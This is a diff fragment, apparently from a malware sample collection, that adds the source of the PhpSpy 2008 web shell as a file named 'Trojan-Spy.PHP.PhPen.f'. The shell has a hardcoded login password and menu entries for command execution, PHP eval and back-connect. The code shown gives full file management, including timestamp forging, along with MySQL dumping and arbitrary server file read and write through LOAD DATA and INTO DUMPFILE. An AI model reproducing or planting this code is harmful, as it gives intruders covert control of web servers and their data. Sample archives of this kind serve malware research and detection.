mysql_free_result($fields); + + $keys = mysql_query("SHOW KEYS FROM $table"); + while ($key = mysql_fetch_array($keys)) { + $kname=$key['Key_name']; + if ($kname != "PRIMARY" and $key['Non_unique'] == 0) { + $kname="UNIQUE|$kname"; + } + if(!is_array($index[$kname])) { + $index[$kname] = array(); + } + $index[$kname][] = $key['Column_name']; + } + mysql_free_result($keys); + + while(list($kname, $columns) = @each($index)) { + $tabledump .= ",\n"; + $colnames=implode($columns,","); + + if ($kname == "PRIMARY") { + $tabledump .= " PRIMARY KEY ($colnames)"; + } else { + if (substr($kname,0,6) == "UNIQUE") { + $kname=substr($kname,7); + } + $tabledump .= " KEY $kname ($colnames)"; + } + } + + $tabledump .= "\n);\n\n"; + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + + $rows = mysql_query("SELECT * FROM $table"); + $numfields = mysql_num_fields($rows); + while ($row = mysql_fetch_array($rows)) { + $tabledump = "INSERT INTO $table VALUES("; + + $fieldcounter=-1; + $firstfield=1; + while (++$fieldcounter<$numfields) { + if (!$firstfield) { + $tabledump.=", "; + } else { + $firstfield=0; + } + + if (!isset($row[$fieldcounter])) { + $tabledump .= "NULL"; + } else { + $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; + } + } + + $tabledump .= ");\n"; + + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + } + mysql_free_result($rows); + } + + class FORMS { + function tableheader() { + echo "\n"; + } + + function headerform($arg=array()) { + global $dir; + if ($arg[enctype]){ + $enctype="enctype=\"$arg[enctype]\""; + } else { + $enctype=""; + } + if (!isset($arg[method])) { + $arg[method] = "POST"; + } + if (!isset($arg[action])) { + $arg[action] = ''; + } + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + } + + function tdheader($title) { + global $dir; + echo " \n"; + echo " \n"; + echo " \n"; + } + + function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') { + if ($bgcolor=='2') { + $css="secondalt"; + } elseif ($bgcolor=='1') { + $css="firstalt"; + } else { + $css=$bgcolor; + } + $height = empty($height) ? "" : " height=".$height; + $colspan = empty($colspan) ? "" : " colspan=".$colspan; + echo " \n"; + echo " \n"; + echo " \n"; + } + + function tablefooter() { + echo "
    ".$arg[content]."
    ".$title." [·µ»Ø]
    ".$content."
    \n"; + } + + function formheader($action='',$title,$target='') { + global $dir; + $target = empty($target) ? "" : " target=\"".$target."\""; + echo "
    \n"; + echo " \n"; + echo " ".$title." [·µ»Ø]\n"; + echo " \n"; + } + + function makehidden($name,$value=''){ + echo "\n"; + } + + function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){ + $css = ($css == 'input') ? " class=\"input\"" : ""; + $input = "\n"; + return $input; + } + + function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){ + $textarea = "\n"; + return $textarea; + } + + function formfooter($over='',$height=''){ + $height = empty($height) ? "" : " height=\"".$height."\""; + echo " \n"; + echo " \n"; + echo " \n"; + echo "
    \n"; + echo $end = empty($over) ? "" : "\n"; + } + + function makeselect($arg = array()){ + if ($arg[multiple]==1) { + $multiple = " multiple"; + if ($arg[size]>0) { + $size = "size=$arg[size]"; + } + } + if ($arg[css]==0) { + $css = "class=\"input\""; + } + $select = "\n"; + return $select; + } + } + + function find($path) //²éÕҹؼü´Ê +{ + global $oldkey,$type,$type2,$endline,$beline; + if(is_dir("$path")){ + $tempdir=opendir("$path"); + while($f=readdir($tempdir)){ if($f=="."||$f=="..")continue; find("$path/$f");} + closedir($tempdir); + }else{ + if(filesize("$path")){ + $fp=fopen("$path","r"); + $msg=fread($fp, filesize("$path")); + fclose($fp); +if(strpos($msg, $oldkey) !== false) { + $dir = dirname($path); + $file = basename($path); +if($type=="list"){ + $mymsg = explode("\n",$msg); + $long = count($mymsg); + $tmp = explode($oldkey,$msg); + $tmp = explode("\n",$tmp[0]); + $first = count($tmp); + $end = "[".$first."/".$long."]"; +} +if($type2=="getpath"){ + $get = explode($oldkey,$msg); + $get = strlen($get[0]); + if(isset($beline)){ + $get = $get-$beline; + } + $getpath = htmlspecialchars(substr($msg, $get, $endline)); + $getpath = "title = \"".$getpath."\""; +} +echo "ÕÒµ½:$dir/$file |view+edit | $end
    "; +} + } + } +} +?> \ No newline at end of file diff --git a/PHP/Trojan-Spy.PHP.PhPen.f b/PHP/Trojan-Spy.PHP.PhPen.f new file mode 100644 index 00000000..c067305b --- /dev/null +++ b/PHP/Trojan-Spy.PHP.PhPen.f @@ -0,0 +1,1990 @@ + $_value) { + if ($_key{0} != '_') { + if (IS_GPC) { + $_value = s_array($_value); + } + $$_key = $_value; + } + } +} + +/*===================== ³ÌÐòÅäÖà =====================*/ +$admin = array(); +// ÊÇ·ñÐèÒªÃÜÂëÑéÖ¤, true ΪÐèÒªÑéÖ¤, false Ϊֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎÞЧ +$admin['check'] = true; +// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë +$admin['pass'] = 'kolya'; + +//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ +// cookie ǰ׺ +$admin['cookiepre'] = ''; +// cookie ×÷ÓÃÓò +$admin['cookiedomain'] = ''; +// cookie ×÷Ó÷¾¶ +$admin['cookiepath'] = '/'; +// cookie ÓÐЧÆÚ +$admin['cookielife'] = 86400; +/*===================== ÅäÖýáÊø =====================*/ + +if ($charset == 'utf8') { + header("content-Type: text/html; charset=utf-8"); +} elseif ($charset == 'big5') { + header("content-Type: text/html; charset=big5"); +} elseif ($charset == 'gbk') { + header("content-Type: text/html; charset=gbk"); +} elseif ($charset == 'latin1') { + header("content-Type: text/html; charset=iso-8859-2"); +} + +$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; +$timestamp = time(); + +/*===================== Éí·ÝÑéÖ¤ =====================*/ +if ($action == "logout") { + scookie('phpspypass', '', -86400 * 365); + p(''); + p('Success'); + exit; +} +if($admin['check']) { + if ($doing == 'login') { + if ($admin['pass'] == $password) { + scookie('phpspypass', $password); + p(''); + p('Success'); + exit; + } + } + if ($_COOKIE['phpspypass']) { + if ($_COOKIE['phpspypass'] != $admin['pass']) { + loginpage(); + } + } else { + loginpage(); + } +} +/*===================== ÑéÖ¤½áÊø =====================*/ + +$errmsg = ''; + +// ²é¿´PHPINFO +if ($action == 'phpinfo') { + if (IS_PHPINFO) { + phpinfo(); + } else { + $errmsg = 'phpinfo() function has non-permissible'; + } +} + +// ÏÂÔØÎļþ +if ($doing == 'downfile' && $thefile) { + if (!@file_exists($thefile)) { + $errmsg = 'The file you want Downloadable was nonexistent'; + } else { + $fileinfo = pathinfo($thefile); + header('Content-type: application/x-'.$fileinfo['extension']); + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header('Content-Length: '.filesize($thefile)); + @readfile($thefile); + exit; + } +} + +// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â +if ($doing == 'backupmysql' && !$saveasfile) { + dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + $table = array_flip($table); + $result = q("SHOW tables"); + if (!$result) p('

    '.mysql_error().'

    '); + $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql'); + header('Content-type: application/unknown'); + header('Content-Disposition: attachment; filename='.$filename); + $mysqldata = ''; + while ($currow = mysql_fetch_array($result)) { + if (isset($table[$currow[0]])) { + $mysqldata .= sqldumptable($currow[0]); + } + } + mysql_close(); + exit; +} + +// ͨ¹ýMYSQLÏÂÔØÎļþ +if($doing=='mysqldown'){ + if (!$dbname) { + $errmsg = 'Please input dbname'; + } else { + dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + if (!file_exists($mysqldlfile)) { + $errmsg = 'The file you want Downloadable was nonexistent'; + } else { + $result = q("select load_file('$mysqldlfile');"); + if(!$result){ + q("DROP TABLE IF EXISTS tmp_angel;"); + q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); + //ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö + q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); + $result = q("select content from tmp_angel"); + q("DROP TABLE tmp_angel"); + } + $row = @mysql_fetch_array($result); + if (!$row) { + $errmsg = 'Load file failed '.mysql_error(); + } else { + $fileinfo = pathinfo($mysqldlfile); + header('Content-type: application/x-'.$fileinfo['extension']); + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header("Accept-Length: ".strlen($row[0])); + echo $row[0]; + exit; + } + } + } +} + +?> + + + +<?php echo str_replace('.','','P.h.p.S.p.y');?> + + + + + + + + + + + +
    Ver: 2008 ()
    Safe Mode: + Logout | + File Manager | + MySQL Manager | + MySQL Upload & Download | + Execute Command | + PHP Variable | + Eval PHP Code + | Back Connect +
    +'); + + p(''); + + //²é¿´ËùÓпÉдÎļþºÍĿ¼ + $dirdata=array(); + $filedata=array(); + + if ($view_writable) { + $dirdata = GetList($nowpath); + } else { + // Ŀ¼Áбí + $dirs=@opendir($dir); + while ($file=@readdir($dirs)) { + $filepath=$nowpath.$file; + if(@is_dir($filepath)){ + $dirdb['filename']=$file; + $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $dirdb['dirchmod']=getChmod($filepath); + $dirdb['dirperm']=getPerms($filepath); + $dirdb['fileowner']=getUser($filepath); + $dirdb['dirlink']=$nowpath; + $dirdb['server_link']=$filepath; + $dirdb['client_link']=ue($filepath); + $dirdata[]=$dirdb; + } else { + $filedb['filename']=$file; + $filedb['size']=sizecount(@filesize($filepath)); + $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $filedb['filechmod']=getChmod($filepath); + $filedb['fileperm']=getPerms($filepath); + $filedb['fileowner']=getUser($filepath); + $filedb['dirlink']=$nowpath; + $filedb['server_link']=$filepath; + $filedb['client_link']=ue($filepath); + $filedata[]=$filedb; + } + }// while + unset($dirdb); + unset($filedb); + @closedir($dirs); + } + @sort($dirdata); + @sort($filedata); + $dir_i = '0'; + foreach($dirdata as $key => $dirdb){ + if($dirdb['filename']!='..' && $dirdb['filename']!='.') { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $dir_i++; + } else { + if($dirdb['filename']=='..') { + p(''); + p(''); + p(''); + } + } + } + + p(''); + p(''); + makehide('action','file'); + makehide('thefile'); + makehide('doing'); + makehide('dir',$nowpath); + $file_i = '0'; + foreach($filedata as $key => $filedb){ + if($filedb['filename']!='..' && $filedb['filename']!='.') { + $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']); + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $file_i++; + } + } + p(''); + p('
    +'goaction')); +makehide('action'); +formfoot(); + +$errmsg && m($errmsg); + +// »ñÈ¡µ±Ç°Â·¾¶ +!$dir && $dir = '.'; +$nowpath = getPath(SA_ROOT, $dir); +if (substr($dir, -1) != '/') { + $dir = $dir.'/'; +} +$uedir = ue($dir); + +if (!$action || $action == 'file') { + + // Åж϶ÁдÇé¿ö + $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable'; + + // ɾ³ýĿ¼ + if ($doing == 'deldir' && $thefile) { + if (!file_exists($thefile)) { + m($thefile.' directory does not exist'); + } else { + m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed')); + } + } + + // ´´½¨Ä¿Â¼ + elseif ($newdirname) { + $mkdirs = $nowpath.$newdirname; + if (file_exists($mkdirs)) { + m('Directory has already existed'); + } else { + m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed')); + @chmod($mkdirs,0777); + } + } + + // ÉÏ´«Îļþ + elseif ($doupfile) { + m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed')); + } + + // ±à¼­Îļþ + elseif ($editfilename && $filecontent) { + $fp = @fopen($editfilename,'w'); + m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed')); + @fclose($fp); + } + + // ±à¼­ÎļþÊôÐÔ + elseif ($pfile && $newperm) { + if (!file_exists($pfile)) { + m('The original file does not exist'); + } else { + $newperm = base_convert($newperm,8,10); + m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed')); + } + } + + // ¸ÄÃû + elseif ($oldname && $newfilename) { + $nname = $nowpath.$newfilename; + if (file_exists($nname) || !file_exists($oldname)) { + m($nname.' has already existed or original file does not exist'); + } else { + m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed')); + } + } + + // ¸´ÖÆÎļþ + elseif ($sname && $tofile) { + if (file_exists($tofile) || !file_exists($sname)) { + m('The goal file has already existed or original file does not exist'); + } else { + m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed')); + } + } + + // ¿Ë¡ʱ¼ä + elseif ($curfile && $tarfile) { + if (!@file_exists($curfile) || !@file_exists($tarfile)) { + m('The goal file has already existed or original file does not exist'); + } else { + $time = @filemtime($tarfile); + m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); + } + } + + // ×Ô¶¨Òåʱ¼ä + elseif ($curfile && $year && $month && $day && $hour && $minute && $second) { + if (!@file_exists($curfile)) { + m(basename($curfile).' does not exist'); + } else { + $time = strtotime("$year-$month-$day $hour:$minute:$second"); + m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); + } + } + + // ´ò°üÏÂÔØ + elseif($doing == 'downrar') { + if ($dl) { + $dfiles=''; + foreach ($dl as $filepath => $value) { + $dfiles.=$filepath.','; + } + $dfiles=substr($dfiles,0,strlen($dfiles)-1); + $dl=explode(',',$dfiles); + $zip=new PHPZip($dl); + $code=$zip->out; + header('Content-type: application/octet-stream'); + header('Accept-Ranges: bytes'); + header('Accept-Length: '.strlen($code)); + header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz'); + echo $code; + exit; + } else { + m('Please select file(s)'); + } + } + + // ÅúÁ¿É¾³ýÎļþ + elseif($doing == 'delfiles') { + if ($dl) { + $dfiles=''; + $succ = $fail = 0; + foreach ($dl as $filepath => $value) { + if (@unlink($filepath)) { + $succ++; + } else { + $fail++; + } + } + m('Deleted file have finished£¬choose '.count($dl).' success '.$succ.' fail '.$fail); + } else { + m('Please select file(s)'); + } + } + + //²Ù×÷Íê±Ï + formhead(array('name'=>'createdir')); + makehide('newdirname'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'fileperm')); + makehide('newperm'); + makehide('pfile'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'copyfile')); + makehide('sname'); + makehide('tofile'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'rename')); + makehide('oldname'); + makehide('newfilename'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'fileopform')); + makehide('action'); + makehide('opfile'); + makehide('dir'); + formfoot(); + + $free = @disk_free_space($nowpath); + !$free && $free = 0; + $all = @disk_total_space($nowpath); + !$all && $all = 0; + $used = $all-$free; + $used_percent = @round(100/($all/$free),2); + p('

    File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)

    '); + +?> + + + + + + + + +
    Current Directory (, )
    + +
    '); + p('
    '); + p('WebRoot'); + if ($view_writable) { + p(' | View All'); + } else { + p(' | View Writable'); + } + p(' | Create Directory | Create File'); + if (IS_WIN && IS_COM) { + $obj = new COM('scripting.filesystemobject'); + if ($obj && is_object($obj)) { + $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk'); + foreach($obj->Drives as $drive) { + if ($drive->DriveType == 2) { + p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); + } else { + p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); + } + } + } + } + + p('
     FilenameLast modifiedSizeChmod / PermsAction
    0'.$dirdb['filename'].''.$dirdb['mtime'].'--'); + p(''.$dirdb['dirchmod'].' / '); + p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'Del | Rename
    =Parent Directory
    '.$filedb['filename'].''.$filedb['mtime'].''.$filedb['size'].''); + p(''.$filedb['filechmod'].' / '); + p(''.$filedb['fileperm'].''.$filedb['fileowner'].''); + p('Down | '); + p('Copy | '); + p('Edit | '); + p('Rename | '); + p('Time'); + p('
    Packing download selected - Delete selected'.$dir_i.' directories / '.$file_i.' files
    '); +}// end dir + +elseif ($action == 'sqlfile') { + if($doing=="mysqlupload"){ + $file = $_FILES['uploadfile']; + $filename = $file['tmp_name']; + if (file_exists($savepath)) { + m('The goal file has already existed'); + } else { + if(!$filename) { + m('Please choose a file'); + } else { + $fp=@fopen($filename,'r'); + $contents=@fread($fp, filesize($filename)); + @fclose($fp); + $contents = bin2hex($contents); + if(!$upname) $upname = $file['name']; + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"); + m($result ? 'Upload success' : 'Upload has failed: '.mysql_error()); + } + } + } +?> + +'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); + formhead(array('title'=>'MYSQL Information','name'=>'dbinfo')); + makehide('action','sqlfile'); + p('

    '); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p(':'); + makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + p('DBName:'); + makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); + p('DBCharset:'); + makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); + p('

    '); + formfoot(); + p('
    '); + p('

    Upload file

    '); + p('

    This operation the DB user must has FILE privilege

    '); + p('

    Save path(fullpath): Choose a file: Upload

    '); + p('

    Download file

    '); + p('

    File: Download

    '); + makehide('dbhost'); + makehide('dbport'); + makehide('dbuser'); + makehide('dbpass'); + makehide('dbname'); + makehide('charset'); + makehide('doing'); + makehide('action','sqlfile'); + p('
    '); +} + +elseif ($action == 'sqladmin') { + !$dbhost && $dbhost = 'localhost'; + !$dbuser && $dbuser = 'root'; + !$dbport && $dbport = '3306'; + $dbform = ''; + if(isset($dbhost)){ + $dbform .= "\n"; + } + if(isset($dbuser)) { + $dbform .= "\n"; + } + if(isset($dbpass)) { + $dbform .= "\n"; + } + if(isset($dbport)) { + $dbform .= "\n"; + } + if(isset($dbname)) { + $dbform .= "\n"; + } + if(isset($charset)) { + $dbform .= "\n"; + } + + if ($doing == 'backupmysql' && $saveasfile) { + if (!$table) { + m('Please choose the table'); + } else { + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + $table = array_flip($table); + $fp = @fopen($path,'w'); + if ($fp) { + $result = q('SHOW tables'); + if (!$result) p('

    '.mysql_error().'

    '); + $mysqldata = ''; + while ($currow = mysql_fetch_array($result)) { + if (isset($table[$currow[0]])) { + sqldumptable($currow[0], $fp); + } + } + fclose($fp); + $fileurl = str_replace(SA_ROOT,'',$path); + m('Database has success backup to '.$path.''); + mysql_close(); + } else { + m('Backup failed'); + } + } + } + if ($insert && $insertsql) { + $keystr = $valstr = $tmp = ''; + foreach($insertsql as $key => $val) { + if ($val) { + $keystr .= $tmp.$key; + $valstr .= $tmp."'".addslashes($val)."'"; + $tmp = ','; + } + } + if ($keystr && $valstr) { + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); + } + } + if ($update && $insertsql && $base64) { + $valstr = $tmp = ''; + foreach($insertsql as $key => $val) { + $valstr .= $tmp.$key."='".addslashes($val)."'"; + $tmp = ','; + } + if ($valstr) { + $where = base64_decode($base64); + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); + } + } + if ($doing == 'del' && $base64) { + $where = base64_decode($base64); + $delete_sql = "DELETE FROM $tablename WHERE $where"; + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); + } + + if ($tablename && $doing == 'drop') { + dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + if (q("DROP TABLE $tablename")) { + m('Drop table of success'); + $tablename = ''; + } else { + m(mysql_error()); + } + } + + $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); + + formhead(array('title'=>'MYSQL Manager')); + makehide('action','sqladmin'); + p('

    '); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p(':'); + makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + p('DBCharset:'); + makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); + makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); + p('

    '); + formfoot(); +?> + +'recordlist')); + makehide('doing'); + makehide('action','sqladmin'); + makehide('base64'); + makehide('tablename'); + p($dbform); + formfoot(); + + //Ñ¡¶¨Êý¾Ý¿â + formhead(array('name'=>'setdbname')); + makehide('action','sqladmin'); + p($dbform); + if (!$dbname) { + makehide('dbname'); + } + formfoot(); + + //Ñ¡¶¨±í + formhead(array('name'=>'settable')); + makehide('action','sqladmin'); + p($dbform); + makehide('tablename'); + makehide('page',$page); + makehide('doing'); + formfoot(); + + $cachetables = array(); + $pagenum = 30; + $page = intval($page); + if($page) { + $start_limit = ($page - 1) * $pagenum; + } else { + $start_limit = 0; + $page = 1; + } + if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { + dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + //»ñÈ¡Êý¾Ý¿âÐÅÏ¢ + $mysqlver = mysql_get_server_info(); + p('

    MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

    '); + $highver = $mysqlver > '4.1' ? 1 : 0; + + //»ñÈ¡Êý¾Ý¿â + $query = q("SHOW DATABASES"); + $dbs = array(); + $dbs[] = '-- Select a database --'; + while($db = mysql_fetch_array($query)) { + $dbs[$db['Database']] = $db['Database']; + } + makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); + $tabledb = array(); + if ($dbname) { + p('

    '); + p('Current dababase: '.$dbname.''); + if ($tablename) { + p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); + } + p('

    '); + mysql_select_db($dbname); + + $getnumsql = ''; + $runquery = 0; + if ($sql_query) { + $runquery = 1; + } + $allowedit = 0; + if ($tablename && !$sql_query) { + $sql_query = "SELECT * FROM $tablename"; + $getnumsql = $sql_query; + $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; + $allowedit = 1; + } + p('
    '); + p('

    Run SQL query/queries on database '.$dbname.':

    '); + makehide('tablename', $tablename); + makehide('action','sqladmin'); + p($dbform); + p('
    '); + if ($tablename || ($runquery && $sql_query)) { + if ($doing == 'structure') { + $result = q("SHOW COLUMNS FROM $tablename"); + $rowdb = array(); + while($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + foreach ($rowdb as $row) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + } + tbfoot(); + } elseif ($doing == 'insert' || $doing == 'edit') { + $result = q('SHOW COLUMNS FROM '.$tablename); + while ($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + $rs = array(); + if ($doing == 'insert') { + p('

    Insert new line in '.$tablename.' table »

    '); + } else { + p('

    Update record in '.$tablename.' table »

    '); + $where = base64_decode($base64); + $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"); + $rs = mysql_fetch_array($result); + } + p(''); + p($dbform); + makehide('action','sqladmin'); + makehide('tablename',$tablename); + p('
    FieldTypeNullKeyDefaultExtra
    '.$row['Field'].''.$row['Type'].''.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' 
    '); + foreach ($rowdb as $row) { + if ($rs[$row['Field']]) { + $value = htmlspecialchars($rs[$row['Field']]); + } else { + $value = ''; + } + $thisbg = bg(); + p(''); + p(''); + } + if ($doing == 'insert') { + p(''); + } else { + p(''); + makehide('base64', $base64); + } + p('
    '.$row['Field'].'
    '.$row['Type'].'
    '); + } else { + $querys = @explode(';',$sql_query); + foreach($querys as $num=>$query) { + if ($query) { + p("

    Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

    "); + switch(qy($query)) + { + case 0: + p('

    Error : '.mysql_error().'

    '); + break; + case 1: + if (strtolower(substr($query,0,13)) == 'select * from') { + $allowedit = 1; + } + if ($getnumsql) { + $tatol = mysql_num_rows(q($getnumsql)); + $multipage = multi($tatol, $pagenum, $page, $tablename); + } + if (!$tablename) { + $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query))); + $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line); + preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches); + $tablename = $matches[1][0]; + } + $result = q($query); + p($multipage); + p(''); + p(''); + if ($allowedit) p(''); + $fieldnum = @mysql_num_fields($result); + for($i=0;$i<$fieldnum;$i++){ + $name = @mysql_field_name($result, $i); + $type = @mysql_field_type($result, $i); + $len = @mysql_field_len($result, $i); + p(""); + } + p(''); + while($mn = @mysql_fetch_assoc($result)){ + $thisbg = bg(); + p(''); + $where = $tmp = $b1 = ''; + foreach($mn as $key=>$inside){ + if ($inside) { + $where .= $tmp.$key."='".addslashes($inside)."'"; + $tmp = ' AND '; + } + $b1 .= ''; + } + $where = base64_encode($where); + if ($allowedit) p(''); + p($b1); + p(''); + unset($b1); + } + tbfoot(); + p($multipage); + break; + case 2: + $ar = mysql_affected_rows(); + p('

    affected rows : '.$ar.'

    '); + break; + } + } + } + } + } else { + $query = q("SHOW TABLE STATUS"); + $table_num = $table_rows = $data_size = 0; + $tabledb = array(); + while($table = mysql_fetch_array($query)) { + $data_size = $data_size + $table['Data_length']; + $table_rows = $table_rows + $table['Rows']; + $table['Data_length'] = sizecount($table['Data_length']); + $table_num++; + $tabledb[] = $table; + } + $data_size = sizecount($data_size); + unset($table); + p('
    Action$name
    $type($len)
    '.html_clean($inside).' Edit | Del
    '); + p(''); + makehide('action','sqladmin'); + p($dbform); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + foreach ($tabledb as $key => $table) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + + p(""); + makehide('doing','backupmysql'); + formfoot(); + p("
    NameRowsData_lengthCreate_timeUpdate_timeEngineCollation
    '.$table['Name'].' [ Insert | Structure | Drop ]'.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].''.$table['Update_time'].''.$table['Engine'].''.$table['Collation'].'
     Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
    Save as file
